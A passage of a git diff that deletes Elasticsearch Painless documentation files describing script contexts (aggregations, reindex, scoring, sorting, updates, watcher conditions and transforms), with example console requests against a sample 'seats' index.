"0" + minutes : "" + minutes) + - ":00+08:00"; <7> - -ZonedDateTime dt = ZonedDateTime.parse( - dts, DateTimeFormatter.ISO_OFFSET_DATE_TIME); <8> -ctx.datetime = dt.getLong(ChronoField.INSTANT_SECONDS)*1000L; <9> ----- -<1> Uses the `splitOnToken` function to separate the date `String` from the - seat data into year, month, and day `Strings`. - Note:: - * The use of the `ctx` ingest processor context variable to retrieve the - data from the `date` field. -<2> Appends the <> `"0"` value to a single - digit month since the format of the seat data allows for this case. -<3> Appends the <> `"0"` value to a single - digit day since the format of the seat data allows for this case. -<4> Sets the <> - <> to `true` if the time `String` is a time - in the afternoon or evening. - Note:: - * The use of the `ctx` ingest processor context variable to retrieve the - data from the `time` field. -<5> Uses the `splitOnToken` function to separate the time `String` from the - seat data into hours and minutes `Strings`. - Note:: - * The use of the `substring` method to remove the `AM` or `PM` portion of - the time `String`. - * The use of the `ctx` ingest processor context variable to retrieve the - data from the `date` field. -<6> If the time `String` is an afternoon or evening value adds the - <> `12` to the existing hours to move to - a 24-hour based time. -<7> Builds a new time `String` that is parsable using existing API methods. -<8> Creates a `ZonedDateTime` <> value by using - the API method `parse` to parse the new time `String`. -<9> Sets the datetime field `datetime` to the number of milliseconds retrieved - from the API method `getLong`. - Note:: - * The use of the `ctx` ingest processor context variable to set the field - `datetime`. Manipulate each document's fields with the `ctx` variable as - each document is indexed. - -Submit the following request: - -[source,console] ----- -PUT /_ingest/pipeline/seats -{ - "description": "update datetime for seats", - "processors": [ - { - "script": { - "source": "String[] dateSplit = ctx.date.splitOnToken('-'); String year = dateSplit[0].trim(); String month = dateSplit[1].trim(); if (month.length() == 1) { month = '0' + month; } String day = dateSplit[2].trim(); if (day.length() == 1) { day = '0' + day; } boolean pm = ctx.time.substring(ctx.time.length() - 2).equals('PM'); String[] timeSplit = ctx.time.substring(0, ctx.time.length() - 2).splitOnToken(':'); int hours = Integer.parseInt(timeSplit[0].trim()); int minutes = Integer.parseInt(timeSplit[1].trim()); if (pm) { hours += 12; } String dts = year + '-' + month + '-' + day + 'T' + (hours < 10 ? '0' + hours : '' + hours) + ':' + (minutes < 10 ? '0' + minutes : '' + minutes) + ':00+08:00'; ZonedDateTime dt = ZonedDateTime.parse(dts, DateTimeFormatter.ISO_OFFSET_DATE_TIME); ctx.datetime = dt.getLong(ChronoField.INSTANT_SECONDS)*1000L;" - } - } - ] -} ----- diff --git a/docs/painless/painless-contexts/painless-metric-agg-combine-context.asciidoc b/docs/painless/painless-contexts/painless-metric-agg-combine-context.asciidoc deleted file mode 100644 index 5cc9ad8ecbb..00000000000 --- a/docs/painless/painless-contexts/painless-metric-agg-combine-context.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[[painless-metric-agg-combine-context]] -=== Metric aggregation combine context - -Use a Painless script to -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[combine] -values for use in a scripted metric aggregation. 
A combine script is run once -per shard following a <> and is -optional as part of a full metric aggregation. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`state` (`Map`):: - `Map` with values available from the prior map script. - -*Return* - -`List`, `Map`, `String`, or primitive:: - A value collected for use in a - <>. If no reduce - script is specified, the value is used as part of the result. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-contexts/painless-metric-agg-init-context.asciidoc b/docs/painless/painless-contexts/painless-metric-agg-init-context.asciidoc deleted file mode 100644 index 8c0fddfa339..00000000000 --- a/docs/painless/painless-contexts/painless-metric-agg-init-context.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[painless-metric-agg-init-context]] -=== Metric aggregation initialization context - -Use a Painless script to -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[initialize] -values for use in a scripted metric aggregation. An initialization script is -run prior to document collection once per shard and is optional as part of the -full metric aggregation. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`state` (`Map`):: - Empty `Map` used to add values for use in a - <>. - -*Side Effects* - -`state` (`Map`):: - Add values to this `Map` to for use in a map. Additional values must - be of the type `Map`, `List`, `String` or primitive. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-contexts/painless-metric-agg-map-context.asciidoc b/docs/painless/painless-contexts/painless-metric-agg-map-context.asciidoc deleted file mode 100644 index a34308aa938..00000000000 --- a/docs/painless/painless-contexts/painless-metric-agg-map-context.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ -[[painless-metric-agg-map-context]] -=== Metric aggregation map context - -Use a Painless script to -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[map] -values for use in a scripted metric aggregation. A map script is run once per -collected document following an optional -<> and is required as -part of a full metric aggregation. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`state` (`Map`):: - `Map` used to add values for processing in a - <> or to be returned from the aggregation. - -`doc` (`Map`, read-only):: - Contains the fields of the current document where each field is a - `List` of values. - -`_score` (`double` read-only):: - The similarity score of the current document. - -*Side Effects* - -`state` (`Map`):: - Use this `Map` to add values for processing in a combine script. - Additional values must be of the type `Map`, `List`, `String` or - primitive. The same `state` `Map` is shared between all aggregated documents - on a given shard. If an initialization script is provided as part of the - aggregation then values added from the initialization script are - available. If no combine script is specified, values must be - directly stored in `state` in a usable form. If no combine script and no - <> are specified, the - `state` values are used as the result. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. 
diff --git a/docs/painless/painless-contexts/painless-metric-agg-reduce-context.asciidoc b/docs/painless/painless-contexts/painless-metric-agg-reduce-context.asciidoc deleted file mode 100644 index b492207ef44..00000000000 --- a/docs/painless/painless-contexts/painless-metric-agg-reduce-context.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[painless-metric-agg-reduce-context]] -=== Metric aggregation reduce context - -Use a Painless script to -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[reduce] -values to produce the result of a scripted metric aggregation. A reduce script -is run once on the coordinating node following a -<> (or a -<> if no combine script is -specified) and is optional as part of a full metric aggregation. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`states` (`Map`):: - `Map` with values available from the prior combine script (or a map - script if no combine script is specified). - -*Return* - -`List`, `Map`, `String`, or primitive:: - A value used as the result. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-contexts/painless-min-should-match-context.asciidoc b/docs/painless/painless-contexts/painless-min-should-match-context.asciidoc deleted file mode 100644 index 46bc2679de8..00000000000 --- a/docs/painless/painless-contexts/painless-min-should-match-context.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[[painless-min-should-match-context]] -=== Minimum should match context - -Use a Painless script to specify the -{ref}/query-dsl-terms-set-query.html[minimum] number of terms that a -specified field needs to match with for a document to be part of the query -results. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`params['num_terms']` (`int`, read-only):: - The number of terms specified to match with. - -`doc` (`Map`, read-only):: - Contains the fields of the current document where each field is a - `List` of values. - -*Return* - -`int`:: - The minimum number of terms required to match the current document. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -Imagine that you want to find seats to performances by your favorite -actors. You have a list of favorite actors in mind, and you want -to find performances where the cast includes at least a certain -number of them. A `terms_set` query with `minimum_should_match_script` -is a way to accomplish this. To make the query request more configurable, -you can define `min_actors_to_see` as a script parameter. - -To ensure that the parameter `min_actors_to_see` doesn't exceed -the number of favorite actors, you can use `num_terms` to get -the number of actors in the list and `Math.min` to get the lesser -of the two. - -[source,Painless] ----- -Math.min(params['num_terms'], params['min_actors_to_see']) ----- - -The following request finds seats to performances with at least -two of the three specified actors. 
 - -[source,console] ----- -GET seats/_search -{ - "query": { - "terms_set": { - "actors": { - "terms": [ - "smith", - "earns", - "black" - ], - "minimum_should_match_script": { - "source": "Math.min(params['num_terms'], params['min_actors_to_see'])", - "params": { - "min_actors_to_see": 2 - } - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - diff --git a/docs/painless/painless-contexts/painless-reindex-context.asciidoc b/docs/painless/painless-contexts/painless-reindex-context.asciidoc deleted file mode 100644 index 4ecf17f6cb7..00000000000 --- a/docs/painless/painless-contexts/painless-reindex-context.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[[painless-reindex-context]] -=== Reindex context - -Use a Painless script in a {ref}/docs-reindex.html[reindex] operation to -add, modify, or delete fields within each document in an original index as it is -reindexed into a target index. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`ctx['op']` (`String`):: - The name of the operation. - -{ref}/mapping-routing-field.html[`ctx['_routing']`] (`String`):: - The value used to select a shard for document storage. - -{ref}/mapping-index-field.html[`ctx['_index']`] (`String`):: - The name of the index. - -{ref}/mapping-type-field.html[`ctx['_type']`] (`String`):: - The type of document within an index. - -{ref}/mapping-id-field.html[`ctx['_id']`] (`int`, read-only):: - The unique document id. - -`ctx['_version']` (`int`):: - The current version of the document. - -{ref}/mapping-source-field.html[`ctx['_source']`] (`Map`):: - Contains extracted JSON in a `Map` and `List` structure for the fields - existing in a stored document. - -*Side Effects* - -`ctx['op']`:: - Use the default of `index` to update a document. Set to `none` to - specify no operation or `delete` to delete the current document from - the index. - -{ref}/mapping-routing-field.html[`ctx['_routing']`]:: - Modify this to change the routing value for the current document. - -{ref}/mapping-index-field.html[`ctx['_index']`]:: - Modify this to change the destination index for the current document. - -{ref}/mapping-type-field.html[`ctx['_type']`]:: - Modify this to change the type for the current document. - -{ref}/mapping-id-field.html[`ctx['_id']`]:: - Modify this to change the id for the current document. - -`ctx['_version']` (`int`):: - Modify this to change the version for the current document. - -{ref}/mapping-source-field.html[`ctx['_source']`]:: - Modify the values in the `Map/List` structure to add, modify, or delete - the fields of a document. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-contexts/painless-score-context.asciidoc b/docs/painless/painless-contexts/painless-score-context.asciidoc deleted file mode 100644 index d62ea600f73..00000000000 --- a/docs/painless/painless-contexts/painless-score-context.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[painless-score-context]] -=== Score context - -Use a Painless script in a -{ref}/query-dsl-function-score-query.html[function score] to apply a new -score to documents returned from a query. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`doc` (`Map`, read-only):: - Contains the fields of the current document. For single-valued fields, - the value can be accessed via `doc['fieldname'].value`. 
For multi-valued - fields, this returns the first value; other values can be accessed - via `doc['fieldname'].get(index)` - -`_score` (`double` read-only):: - The similarity score of the current document. - -*Return* - -`double`:: - The score for the current document. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -The following query finds all unsold seats, with lower 'row' values -scored higher. - -[source,console] --------------------------------------------------- -GET /seats/_search -{ - "query": { - "function_score": { - "query": { - "match": { - "sold": "false" - } - }, - "script_score": { - "script": { - "source": "1.0 / doc['row'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:seats] \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-similarity-context.asciidoc b/docs/painless/painless-contexts/painless-similarity-context.asciidoc deleted file mode 100644 index 98eff19a194..00000000000 --- a/docs/painless/painless-contexts/painless-similarity-context.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[painless-similarity-context]] -=== Similarity context - -Use a Painless script to create a -{ref}/index-modules-similarity.html[similarity] equation for scoring -documents in a query. - -*Variables* - -`weight` (`float`, read-only):: - The weight as calculated by a <> - -`query.boost` (`float`, read-only):: - The boost value if provided by the query. If this is not provided the - value is `1.0f`. - -`field.docCount` (`long`, read-only):: - The number of documents that have a value for the current field. - -`field.sumDocFreq` (`long`, read-only):: - The sum of all terms that exist for the current field. If this is not - available the value is `-1`. - -`field.sumTotalTermFreq` (`long`, read-only):: - The sum of occurrences in the index for all the terms that exist in the - current field. If this is not available the value is `-1`. - -`term.docFreq` (`long`, read-only):: - The number of documents that contain the current term in the index. - -`term.totalTermFreq` (`long`, read-only):: - The total occurrences of the current term in the index. - -`doc.length` (`long`, read-only):: - The number of tokens the current document has in the current field. This - is decoded from the stored {ref}/norms.html[norms] and may be approximate for - long fields - -`doc.freq` (`long`, read-only):: - The number of occurrences of the current term in the current - document for the current field. - -Note that the `query`, `field`, and `term` variables are also available to the -<>. They are more efficiently used -there, as they are constant for all documents. - -For queries that contain multiple terms, the script is called once for each -term with that term's calculated weight, and the results are summed. Note that some -terms might have a `doc.freq` value of `0` on a document, for example if a query -uses synonyms. - -*Return* - -`double`:: - The similarity score for the current document. - -*API* - -The standard <> is available. 
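To make these variables concrete, here is a minimal sketch of a scripted similarity configured at index creation time; the index name `my-index` and field name `my_field` are arbitrary, and the script is just a simple TF-IDF-style formula built from the variables described above.

[source,console]
----
PUT /my-index
{
  "settings": {
    "number_of_shards": 1,
    "similarity": {
      "scripted_tfidf": {
        "type": "scripted",
        "script": {
          "source": "double tf = Math.sqrt(doc.freq); double idf = Math.log((field.docCount + 1.0) / (term.docFreq + 1.0)) + 1.0; double norm = 1 / Math.sqrt(doc.length); return query.boost * tf * idf * norm;"
        }
      }
    }
  },
  "mappings": {
    "properties": {
      "my_field": { "type": "text", "similarity": "scripted_tfidf" }
    }
  }
}
----
// TEST[skip: illustrative sketch only]

Any field mapped with `"similarity": "scripted_tfidf"` is then scored by the script instead of the default similarity.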
\ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-sort-context.asciidoc b/docs/painless/painless-contexts/painless-sort-context.asciidoc deleted file mode 100644 index d15d5b30811..00000000000 --- a/docs/painless/painless-contexts/painless-sort-context.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[[painless-sort-context]] -=== Sort context - -Use a Painless script to -{ref}/sort-search-results.html[sort] the documents in a query. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`doc` (`Map`, read-only):: - Contains the fields of the current document. For single-valued fields, - the value can be accessed via `doc['fieldname'].value`. For multi-valued - fields, this returns the first value; other values can be accessed - via `doc['fieldname'].get(index)` - -`_score` (`double` read-only):: - The similarity score of the current document. - -*Return* - -`double`:: - The score for the current document. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -To sort results by the length of the `theatre` field, submit the following query: - -[source,console] ----- -GET /_search -{ - "query": { - "term": { - "sold": "true" - } - }, - "sort": { - "_script": { - "type": "number", - "script": { - "lang": "painless", - "source": "doc['theatre'].value.length() * params.factor", - "params": { - "factor": 1.1 - } - }, - "order": "asc" - } - } -} ----- -// TEST[setup:seats] \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-update-by-query-context.asciidoc b/docs/painless/painless-contexts/painless-update-by-query-context.asciidoc deleted file mode 100644 index d01e4a19d8c..00000000000 --- a/docs/painless/painless-contexts/painless-update-by-query-context.asciidoc +++ /dev/null @@ -1,95 +0,0 @@ -[[painless-update-by-query-context]] -=== Update by query context - -Use a Painless script in an -{ref}/docs-update-by-query.html[update by query] operation to add, -modify, or delete fields within each of a set of documents collected as the -result of a query. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`ctx['op']` (`String`):: - The name of the operation. - -{ref}/mapping-routing-field.html[`ctx['_routing']`] (`String`, read-only):: - The value used to select a shard for document storage. - -{ref}/mapping-index-field.html[`ctx['_index']`] (`String`, read-only):: - The name of the index. - -{ref}/mapping-type-field.html[`ctx['_type']`] (`String`, read-only):: - The type of document within an index. - -{ref}/mapping-id-field.html[`ctx['_id']`] (`int`, read-only):: - The unique document id. - -`ctx['_version']` (`int`, read-only):: - The current version of the document. - -{ref}/mapping-source-field.html[`ctx['_source']`] (`Map`):: - Contains extracted JSON in a `Map` and `List` structure for the fields - existing in a stored document. - -*Side Effects* - -`ctx['op']`:: - Use the default of `index` to update a document. Set to `none` to - specify no operation or `delete` to delete the current document from - the index. - -{ref}/mapping-source-field.html[`ctx['_source']`]:: - Modify the values in the `Map/List` structure to add, modify, or delete - the fields of a document. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. 
- -The following query finds all seats in a specific section that have not been -sold and lowers the price by 2: - -[source,console] --------------------------------------------------- -POST /seats/_update_by_query -{ - "query": { - "bool": { - "filter": [ - { - "range": { - "row": { - "lte": 3 - } - } - }, - { - "match": { - "sold": false - } - } - ] - } - }, - "script": { - "source": "ctx._source.cost -= params.discount", - "lang": "painless", - "params": { - "discount": 2 - } - } -} --------------------------------------------------- -// TEST[setup:seats] diff --git a/docs/painless/painless-contexts/painless-update-context.asciidoc b/docs/painless/painless-contexts/painless-update-context.asciidoc deleted file mode 100644 index b181f94bc16..00000000000 --- a/docs/painless/painless-contexts/painless-update-context.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[painless-update-context]] -=== Update context - -Use a Painless script in an {ref}/docs-update.html[update] operation to -add, modify, or delete fields within a single document. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`ctx['op']` (`String`):: - The name of the operation. - -{ref}/mapping-routing-field.html[`ctx['_routing']`] (`String`, read-only):: - The value used to select a shard for document storage. - -{ref}/mapping-index-field.html[`ctx['_index']`] (`String`, read-only):: - The name of the index. - -{ref}/mapping-type-field.html[`ctx['_type']`] (`String`, read-only):: - The type of document within an index. - -{ref}/mapping-id-field.html[`ctx['_id']`] (`int`, read-only):: - The unique document id. - -`ctx['_version']` (`int`, read-only):: - The current version of the document. - -`ctx['_now']` (`long`, read-only):: - The current timestamp in milliseconds. - -{ref}/mapping-source-field.html[`ctx['_source']`] (`Map`):: - Contains extracted JSON in a `Map` and `List` structure for the fields - existing in a stored document. - -*Side Effects* - -`ctx['op']`:: - Use the default of `index` to update a document. Set to `none` to - specify no operation or `delete` to delete the current document from - the index. - -{ref}/mapping-source-field.html[`ctx['_source']`]:: - Modify the values in the `Map/List` structure to add, modify, or delete - the fields of a document. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -The following query updates a document to be sold, and sets the cost -to the actual price paid after discounts: - -[source,console] --------------------------------------------------- -POST /seats/_update/3 -{ - "script": { - "source": "ctx._source.sold = true; ctx._source.cost = params.sold_cost", - "lang": "painless", - "params": { - "sold_cost": 26 - } - } -} --------------------------------------------------- -// TEST[setup:seats] diff --git a/docs/painless/painless-contexts/painless-watcher-condition-context.asciidoc b/docs/painless/painless-contexts/painless-watcher-condition-context.asciidoc deleted file mode 100644 index 945c47646cc..00000000000 --- a/docs/painless/painless-contexts/painless-watcher-condition-context.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[[painless-watcher-condition-context]] -=== Watcher condition context - -Use a Painless script as a {ref}/condition-script.html[watch condition] -that determines whether to execute a watch or a particular action within a watch. 
-Condition scripts return a Boolean value to indicate the status of the condition. - -include::painless-watcher-context-variables.asciidoc[] - -*Return* - -`boolean`:: - Expects `true` if the condition is met, and `false` if it is not. - -*API* - -The standard <> is available. - -*Example* - -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "condition" : { - "script" : - """ - return ctx.payload.aggregations.theatres.buckets.stream() <1> - .filter(theatre -> theatre.money.value < 15000 || - theatre.money.value > 50000) <2> - .count() > 0 <3> - """ - }, - "actions" : { - "my_log" : { - "logging" : { - "text" : "The output of the search was : {{ctx.payload.aggregations.theatres.buckets}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -<1> The Java Stream API is used in the condition. This API allows manipulation of -the elements of the list in a pipeline. -<2> The stream filter removes items that do not meet the filter criteria. -<3> If there is at least one item in the list, the condition evaluates to true and the watch is executed. - -The following action condition script controls execution of the my_log action based -on the value of the seats sold for the plays in the data set. The script aggregates -the total sold seats for each play and returns true if there is at least one play -that has sold over $50,000. - -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "actions" : { - "my_log" : { - "condition": { <1> - "script" : - """ - return ctx.payload.aggregations.theatres.buckets.stream() - .anyMatch(theatre -> theatre.money.value > 50000) <2> - """ - }, - "logging" : { - "text" : "At least one play has grossed over $50,000: {{ctx.payload.aggregations.theatres.buckets}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -This example uses a nearly identical condition as the previous example. The -differences below are subtle and are worth calling out. - -<1> The location of the condition is no longer at the top level, but is within -an individual action. -<2> Instead of a filter, `anyMatch` is used to return a boolean value - -The following example shows scripted watch and action conditions within the -context of a complete watch. This watch also uses a scripted -<>. 
- -include::painless-watcher-context-example.asciidoc[] diff --git a/docs/painless/painless-contexts/painless-watcher-context-example.asciidoc b/docs/painless/painless-contexts/painless-watcher-context-example.asciidoc deleted file mode 100644 index db1394416b6..00000000000 --- a/docs/painless/painless-contexts/painless-watcher-context-example.asciidoc +++ /dev/null @@ -1,159 +0,0 @@ -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "metadata" : { "high_threshold": 50000, "low_threshold": 15000 }, - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "condition" : { - "script" : - """ - return ctx.payload.aggregations.theatres.buckets.stream() - .anyMatch(theatre -> theatre.money.value < ctx.metadata.low_threshold || - theatre.money.value > ctx.metadata.high_threshold) - """ - }, - "transform" : { - "script": - """ - return [ - 'money_makers': ctx.payload.aggregations.theatres.buckets.stream() - .filter(t -> { - return t.money.value > ctx.metadata.high_threshold - }) - .map(t -> { - return ['play': t.key, 'total_value': t.money.value ] - }).collect(Collectors.toList()), - 'duds' : ctx.payload.aggregations.theatres.buckets.stream() - .filter(t -> { - return t.money.value < ctx.metadata.low_threshold - }) - .map(t -> { - return ['play': t.key, 'total_value': t.money.value ] - }).collect(Collectors.toList()) - ] - """ - }, - "actions" : { - "log_money_makers" : { - "condition": { - "script" : "return ctx.payload.money_makers.size() > 0" - }, - "transform": { - "script" : - """ - def formatter = NumberFormat.getCurrencyInstance(); - return [ - 'plays_value': ctx.payload.money_makers.stream() - .map(t-> formatter.format(t.total_value) + ' for the play ' + t.play) - .collect(Collectors.joining(", ")) - ] - """ - }, - "logging" : { - "text" : "The following plays contain the highest grossing total income: {{ctx.payload.plays_value}}" - } - }, - "log_duds" : { - "condition": { - "script" : "return ctx.payload.duds.size() > 0" - }, - "transform": { - "script" : - """ - def formatter = NumberFormat.getCurrencyInstance(); - return [ - 'plays_value': ctx.payload.duds.stream() - .map(t-> formatter.format(t.total_value) + ' for the play ' + t.play) - .collect(Collectors.joining(", ")) - ] - """ - }, - "logging" : { - "text" : "The following plays need more advertising due to their low total income: {{ctx.payload.plays_value}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -The following example shows the use of metadata and transforming dates into a readable format. 
- -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "metadata" : { "min_hits": 10000 }, - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "condition" : { - "script" : - """ - return ctx.payload.hits.total > ctx.metadata.min_hits - """ - }, - "transform" : { - "script" : - """ - def theDate = ZonedDateTime.ofInstant(ctx.execution_time.toInstant(), ctx.execution_time.getZone()); - return ['human_date': DateTimeFormatter.RFC_1123_DATE_TIME.format(theDate), - 'aggregations': ctx.payload.aggregations] - """ - }, - "actions" : { - "my_log" : { - "logging" : { - "text" : "The watch was successfully executed on {{ctx.payload.human_date}} and contained {{ctx.payload.aggregations.theatres.buckets.size}} buckets" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-watcher-context-variables.asciidoc b/docs/painless/painless-contexts/painless-watcher-context-variables.asciidoc deleted file mode 100644 index 71a00711091..00000000000 --- a/docs/painless/painless-contexts/painless-watcher-context-variables.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ -The following variables are available in all watcher contexts. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`ctx['watch_id']` (`String`, read-only):: - The id of the watch. - -`ctx['id']` (`String`, read-only):: - The server generated unique identifer for the run watch. - -`ctx['metadata']` (`Map`, read-only):: - Metadata can be added to the top level of the watch definition. This - is user defined and is typically used to consolidate duplicate values - in a watch. - -`ctx['execution_time']` (`ZonedDateTime`, read-only):: - The time the watch began execution. - -`ctx['trigger']['scheduled_time']` (`ZonedDateTime`, read-only):: - The scheduled trigger time for the watch. This is the time the - watch should be executed. - -`ctx['trigger']['triggered_time']` (`ZonedDateTime`, read-only):: - The actual trigger time for the watch. This is the time the - watch was triggered for execution. - -`ctx['payload']` (`Map`, read-only):: - The accessible watch data based upon the - {ref}/input.html[watch input]. - -*API* - - -The standard <> is available. - -To run this example, first follow the steps in -<>. diff --git a/docs/painless/painless-contexts/painless-watcher-transform-context.asciidoc b/docs/painless/painless-contexts/painless-watcher-transform-context.asciidoc deleted file mode 100644 index 9d71a5f2335..00000000000 --- a/docs/painless/painless-contexts/painless-watcher-transform-context.asciidoc +++ /dev/null @@ -1,157 +0,0 @@ -[[painless-watcher-transform-context]] -=== Watcher transform context - -Use a Painless script as a {ref}/transform-script.html[watch transform] -to transform a payload into a new payload for further use in the watch. -Transform scripts return an Object value of the new payload. - -include::painless-watcher-context-variables.asciidoc[] - -*Return* - -`Object`:: - The new payload. - -*API* - -The standard <> is available. 
- -*Example* - -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { "term": { "sold": "true"} }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "transform" : { - "script": - """ - return [ - 'money_makers': ctx.payload.aggregations.theatres.buckets.stream() <1> - .filter(t -> { <2> - return t.money.value > 50000 - }) - .map(t -> { <3> - return ['play': t.key, 'total_value': t.money.value ] - }).collect(Collectors.toList()), <4> - 'duds' : ctx.payload.aggregations.theatres.buckets.stream() <5> - .filter(t -> { - return t.money.value < 15000 - }) - .map(t -> { - return ['play': t.key, 'total_value': t.money.value ] - }).collect(Collectors.toList()) - ] - """ - }, - "actions" : { - "my_log" : { - "logging" : { - "text" : "The output of the payload was transformed to {{ctx.payload}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -<1> The Java Stream API is used in the transform. This API allows manipulation of -the elements of the list in a pipeline. -<2> The stream filter removes items that do not meet the filter criteria. -<3> The stream map transforms each element into a new object. -<4> The collector reduces the stream to a `java.util.List`. -<5> This is done again for the second set of values in the transform. - -The following action transform changes each value in the mod_log action into a `String`. -This transform does not change the values in the unmod_log action. - -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "actions" : { - "mod_log" : { - "transform": { <1> - "script" : - """ - def formatter = NumberFormat.getCurrencyInstance(); - return [ - 'msg': ctx.payload.aggregations.theatres.buckets.stream() - .map(t-> formatter.format(t.money.value) + ' for the play ' + t.key) - .collect(Collectors.joining(", ")) - ] - """ - }, - "logging" : { - "text" : "The output of the payload was transformed to: {{ctx.payload.msg}}" - } - }, - "unmod_log" : { <2> - "logging" : { - "text" : "The output of the payload was not transformed and this value should not exist: {{ctx.payload.msg}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -This example uses the streaming API in a very similar manner. The differences below are -subtle and worth calling out. - -<1> The location of the transform is no longer at the top level, but is within -an individual action. -<2> A second action that does not transform the payload is given for reference. - -The following example shows scripted watch and action transforms within the -context of a complete watch. This watch also uses a scripted -<>. 
